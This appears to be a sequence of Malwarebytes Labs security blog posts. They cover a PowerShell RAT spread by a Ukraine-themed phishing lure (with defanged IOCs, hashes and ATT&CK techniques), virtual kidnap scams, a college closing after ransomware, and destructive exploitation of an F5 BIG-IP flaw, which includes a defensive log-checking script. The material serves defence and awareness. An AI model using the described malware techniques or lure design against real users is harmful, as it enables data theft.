  • Command (type: C0MM4ND): Execute a specific command

German command and control server

The attack was thoughtfully carried out—even ensuring that the stolen data was sent to a German domain name, kleinm[.]de, to avoid suspicion.

(Image: the POST request carrying the stolen data to kleinm[.]de)

It is not easy to attribute this activity to a specific actor, and there are no solid indicators to support attribution. Based on motivation alone, we hypothesise that a Russian threat actor could be targeting German users, but without clear connections in infrastructure or similarities to known TTPs, such attribution is weak.

The Malwarebytes Threat Intelligence team continues to monitor attacks taking advantage of the war in Ukraine while ensuring our customers are protected.

Indicators of Compromise (IOCs)

Phishing site

collaboration-bw[.]de/bedrohung-ukr.html

Lure

2022-Q2-Bedrohungslage-Ukraine.zip
2430f68285120686233569e51e2147914dc87f82c7dbdf07fe0c34dbb1aca77c
2022-Q2-Bedrohungslage-Ukraine.chm
80bad7e0d5a5d2782674bb8334dcca03534aa831c37aebb5962da1cd1bec4130

Status.txt
a5d8beaa832832576ca97809be4eee9441eb6907752a7e1f9a390b29bbb9fe1f

MonitorHealth.cmd
fc71522a4125ca4bdc5e5deca4a6498e7f2da4408614c2e1284c3ae8c083a5fd

C2

kleinm[.]de

MITRE ATT&CK

Tactic           ID     Name                                          Description
Execution        T1059  Command and Scripting Interpreter             Starts cmd.exe to run hh.exe; executes a PowerShell script to download and execute a further script
Persistence      T1053  Scheduled Task/Job                            Uses the task scheduler to add MonitorHealth.cmd as a daily task
Defense evasion  T1222  File and Directory Permissions Modification   Uses attrib.exe to hide the SecuriyHealthService folder

The post Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis appeared first on Malwarebytes Labs.

How to spot the signs of a virtual kidnap scam

Threats and bluster play a key role in most online attacks: Ransomware has its ransom note; trolls threaten to ramp up the pressure; tech support scammers insist your PC needs urgent assistance.

Some take it a step further, leaning in with a more direct approach, ranging from death threats to sextortion, and even kidnap claims. These tactics have been around for a very long time. You can reach back to 2007 and look in amazement at the 419 death threat. In 2013, we had pretend hitmen threatening murder unless victims paid $25,000 to survive their non-existent wrath.

An example of the kidnapping variety is currently in the news, and it’s well worth familiarising yourself with it.

The virtual kidnap: Step by step

Kidnap scams involve making a phone call to a victim and telling them a loved one has been taken. Threats of violence soon follow, unless a ransom—typically in the form of a wire transfer—is paid. The most disturbing aspect of these calls is that scammers play recordings of screams in the background.

One horribly fascinating aspect of this crime is that panic and adrenaline can convince victims that the voice they hear is that of their son, daughter, spouse, and so on. You see this time and time again. In that kind of high-stakes, high-pressure scenario, who can blame them?

Things become even worse when social engineering combines with publicly available data to make it even more convincing.

Profiling the victim

Victims of the most recent virtual kidnap attempt likely had some of their information used against them in the call. Scammers pretended to have someone’s mother held hostage, with the threat of never seeing her again. Sadly, the ruse was made more convincing because the caller ID displayed the recipient’s mother’s phone number. Caller ID is trivially spoofed, so this proves nothing about where the call actually came from; all the scammers needed was to know which number belonged to the mother. Somehow, somewhere, they were able to connect the two relatives and their cell numbers.

The already convincing impact of the scream recording would be amplified by the recognisable number. At this point, it’s already game over. The fraudster on this occasion asked for money to be sent through Venmo. We see criminals gravitating to digital payment systems, cryptocurrencies, and even gift cards across most realms of attack. Wire fraud is still big business, but digital transfers are appealing to those wanting to make a quick getaway.

On this occasion, the victim is $900 out of pocket and that’s before we consider the significant psychological impact of a supposed kidnap phone call.

Tips to avoid virtual kidnapping attempts

This is clearly an incredibly disturbing thing to have happen, and plenty of tactics to combat this crime have been developed over the past decade. FBI Chicago released several good pieces of advice in March, which take into account the social engineering side of things:

  • Never post news of upcoming travel dates and locations online.
  • Discuss virtual kidnapping with family members prior to any travel.
  • Have a “password” that family members can use to confirm a loved one is really in trouble.
  • Be wary of providing financial information to strangers over the phone.

Some of the other tips focus mainly on bogus wire transfers. As we see above, criminals are happy to use other methods to swipe ill-gotten gains. A caller who can’t describe the victim is another giveaway, but how many people would risk asking for a description in the heat of the moment? Would you really want to upset a kidnapper and have them just hang up because you said the wrong thing?

Keeping cell phone numbers private on any website is a must. Posting photos of your vacation in real time? Set up a private Instagram and share it with close friends and family only. Don’t leave contact details of family members stored in easily compromised email accounts. Lock them down with whatever additional methods are to hand. Two-factor authentication and password managers are good places to start.

Nobody wants a late night call claiming a loved one is being held hostage. Having said that, if the worst happens? Keep cool, take a deep breath, and work your way through the above suggestions. It’s almost certainly an astonishingly malicious piece of fakery.

The post How to spot the signs of a virtual kidnap scam appeared first on Malwarebytes Labs.

College closes down after ransomware attack

Lincoln College, one of the few rural schools in Illinois, said that it will permanently close on Friday, May 13, after 157 years, partly due to the impacts of the COVID-19 pandemic and partly due to a long recovery after a ransomware attack in December 2021. The institution notified the Illinois Department of Higher Education and Higher Learning Commission and posted a goodbye note on its website.

“Lincoln College has survived many difficult and challenging times – the economic crisis of 1887, a major campus fire in 1912, the Spanish flu of 1918, the Great Depression, World War II, the 2008 global financial crisis, and more, but this is different. Lincoln College needs help to survive.”

The institution struggled during the ongoing pandemic and a December 2021 ransomware attack only challenged it further. Lincoln said the attack “thwarted admissions activities and hindered access to all institutional data, creating an unclear picture of Fall 2022 enrollment projections”.

“All systems required for recruitment, retention, and fundraising efforts were inoperable. Fortunately, no personal identifying information was exposed. Once fully restored in March 2022, the projections displayed significant enrollment shortfalls, requiring a transformational donation or partnership to sustain Lincoln College beyond the current semester.”

The closing of a US college or university marks another first in ransomware attack history. Kim Milford, Director of the Research and Education Networks Information Sharing and Analysis Center (REN-ISAC), told NBC News, which first broke the story, that a school closing only underscores the toll a ransomware attack can take on its victim. “I feel really bad for Lincoln College and wish there was some way we could help, but it can be a very expensive proposition when you’re hit by ransomware,” she said.

How to avoid ransomware attacks

  1. Require the use of multi-factor authentication (MFA). It might feel like a bother, but MFA is relatively easy to set up, and it doesn’t disrupt normal day-to-day activities.
  2. Install security software on all systems. Use one that offers multiple layers of protection against online threats, especially ransomware.
  3. Patch as soon as you can. Universities rely on various software for various tasks. Keeping it all up-to-date means cybercriminals can’t exploit existing and known flaws.
  4. Promote awareness for all faculty members and staff. Educating university employees to help them understand their part in protecting the university from cyberattacks is essential. Remember that this is the responsibility of every faculty member, staff member, and student, not just the people in IT.
  5. Back up your files. When it comes to ransomware attacks, this is one of the pieces of advice we always give out. But as we found out, you have to know how to back things up properly. This episode of our Lock and Code podcast, with Matt Crape, technical account manager at VMware, is worth a listen to learn more about why backups fail us when we need them the most.

If you want to read more about how to protect yourself from a ransomware attack, or how to recover if you are in the midst of one, download our Ransomware Emergency Kit.

The post College closes down after ransomware attack appeared first on Malwarebytes Labs.

F5 BIG-IP vulnerability is now being used to disable servers

As we reported a few days ago, an F5 BIG-IP vulnerability listed as CVE-2022-1388 is actively being exploited. But now researchers have noticed that attackers aren’t just taking control of the vulnerable servers but also making them unusable by destroying the device’s file system.

F5 BIG-IP

The BIG-IP platform by F5 is a family of products covering software and hardware designed around application availability, access control, and security solutions. It is used for various applications like load balancing and application delivery.

On May 4, 2022, F5 notified users of the existence of a vulnerability in BIG-IP iControl REST where undisclosed requests could bypass iControl REST authentication. F5 said the vulnerability could allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. The attacker, in other words, could gain complete control over the affected device.
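Because the bypass is only reachable by whoever can talk to iControl REST over the management port or a self IP, one cheap defensive check is to confirm that nothing outside the management allow-list is reaching iControl REST at all. The script below is an added example, not F5’s tooling and not code from this post; it assumes a constructed, simplified access-log format (timestamp, client IP, method, path, status) and an operator-supplied list of management networks, so it would need a small parser change for real BIG-IP log formats:

```python
"""Flag iControl REST requests that reach a BIG-IP from outside the management allow-list.

Added example, not F5 tooling. The log format below is an assumption
(constructed for this example); real BIG-IP request logs are laid out differently.
"""
import ipaddress
import re
from dataclasses import dataclass

# iControl REST is served under /mgmt/ on BIG-IP; that path prefix is the only
# product-specific detail this check relies on.
ICONTROL_PREFIX = "/mgmt/"

# Constructed sample log lines in the assumed format:
#   "<timestamp> <client_ip> <METHOD> <path> <status>"
SAMPLE_LOG = """\
2022-05-09T10:00:01Z 10.0.0.5 GET /mgmt/tm/sys/version 200
2022-05-09T10:00:07Z 203.0.113.44 POST /mgmt/shared/authn/login 401
2022-05-09T10:00:09Z 203.0.113.44 GET /mgmt/tm/ltm/virtual 200
2022-05-09T10:00:12Z 198.51.100.7 GET /index.html 200
2022-05-09T10:00:15Z 10.0.0.9 POST /mgmt/tm/ltm/virtual 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<ip>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+(?P<status>\d{3})$"
)


@dataclass(frozen=True)
class Request:
    ts: str
    client_ip: str
    method: str
    path: str
    status: int


def parse_line(line):
    """Parse one log line in the assumed format; return None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Request(m["ts"], m["ip"], m["method"], m["path"], int(m["status"]))


def build_allowlist(cidrs):
    """Turn operator-supplied CIDR strings into network objects (IPv4 or IPv6)."""
    return [ipaddress.ip_network(c, strict=False) for c in cidrs]


def is_allowed(ip, allowlist):
    """True only if the client address sits inside one of the management networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # unparseable address: never treat it as trusted
    return any(addr in net for net in allowlist)


def find_untrusted_mgmt_requests(log_text, allowlist):
    """Return every iControl REST request whose source is outside the allow-list.

    Every such request is reported regardless of status code: a 401 still shows
    that an untrusted client can reach the authentication surface at all.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec.path.startswith(ICONTROL_PREFIX):
            continue
        if not is_allowed(rec.client_ip, allowlist):
            findings.append(rec)
    return findings


def summarize(findings):
    """Count flagged requests per client IP so the noisiest source stands out."""
    counts = {}
    for f in findings:
        counts[f.client_ip] = counts.get(f.client_ip, 0) + 1
    return counts


if __name__ == "__main__":
    allow = build_allowlist(["10.0.0.0/24"])  # assumed management network
    hits = find_untrusted_mgmt_requests(SAMPLE_LOG, allow)
    for h in hits:
        print(f"{h.ts} {h.client_ip} {h.method} {h.path} -> {h.status}")
    print(summarize(hits))
```

Run against the constructed sample with 10.0.0.0/24 as the management network, the two requests from 203.0.113.44 are flagged and the 10.0.0.x traffic is not. Any hit here means the interface F5 told customers to keep off untrusted networks is reachable from one, which is worth fixing whether or not the device has been patched yet.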

Soon after the patch, two separate groups of researchers announced on Twitter that they had developed exploits and would publish them soon. Other researchers noticed online scanning was ongoing for BIG-IP.

Due to the critical nature of the bug, F5 urged admins to apply updates as soon as possible.

New type of attack

While most of the attacks so far were aimed at creating a foothold or gathering information for further attacks, we are now seeing a very different and destructive type of attack.

At least one group of attackers is sending commands to vulnerable devices that delete the whole F5 file system, which breaks load balancing and takes the websites behind it offline.

[Image: attackers are wiping vulnerable devices’ file systems]

While destroying the file system of the device may seem worse than data exfiltration or planting a backdoor at first glance, some researchers are saying it may be a blessing in disguise. The group is making the vulnerable devices unavailable to threat actors who are trying to use the more monetizable attack vectors. Most of the original attacks were dropping web shells, which are malicious scripts that allow an attacker to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)

The motives of this threat actor are hard to guess. Maybe it’s simply a case of showing off, or an act out of sheer frustration.

But for those running a vulnerable device this makes the “can’t patch now, for it will make the device unavailable” argument moot. If this attacker gets to you, the device will be unavailable for much longer than it takes to patch.

Stay safe, everyone!

The post F5 BIG-IP vulnerability is now being used to disable servers appeared first on Malwarebytes Labs.